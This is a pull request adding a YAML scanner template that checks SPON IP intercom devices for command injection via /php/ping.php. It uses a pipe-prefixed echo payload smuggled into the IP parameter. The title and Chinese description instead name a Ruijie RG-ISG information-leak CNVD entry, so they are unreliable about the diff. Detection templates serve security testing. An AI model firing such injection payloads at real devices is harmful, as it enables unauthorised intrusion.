### PR TITLE
poc-yaml-rg-isg-cnvd-2021-30900-info-leak

### DIFF
--- a/pocs/spon-ip-intercom-ping-rce.yml
+++ b/pocs/spon-ip-intercom-ping-rce.yml
@@ -1,0 +1,24 @@
+name: poc-yaml-spon-ip-intercom-ping-rce
+manual: true
+transport: http
+set:
+  r1: randomLowercase(10)
+  r2: randomLowercase(10)
+  r3: randomLowercase(10)
+  r4: randomLowercase(10)
+rules:
+  r1:
+    request:
+      cache: true
+      method: POST
+      path: /php/ping.php
+      headers:
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+      body: |
+        jsondata[ip]=%7C echo {{r1}}${{{r2}}}{{r3}}^{{r4}}&jsondata[type]=0
+    expression: response.status == 200 && (response.body.bcontains(bytes(r1 + r3 + "^" + r4)) || response.body.bcontains(bytes(r1 + "${" + r2 + "}" + r3 + r4)))
+expression: r1()
+detail:
+  author: york
+  links:
+    - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
cnvd-2021-30900 锐捷-RG-ISG-敏感信息泄露漏洞
## 测试环境
fofa：title="RG-ISG"
## 备注
![image](https://user-images.githubusercontent.com/35722040/141092963-47d58bd2-80a0-4fb5-8d95-c2573140b815.png)
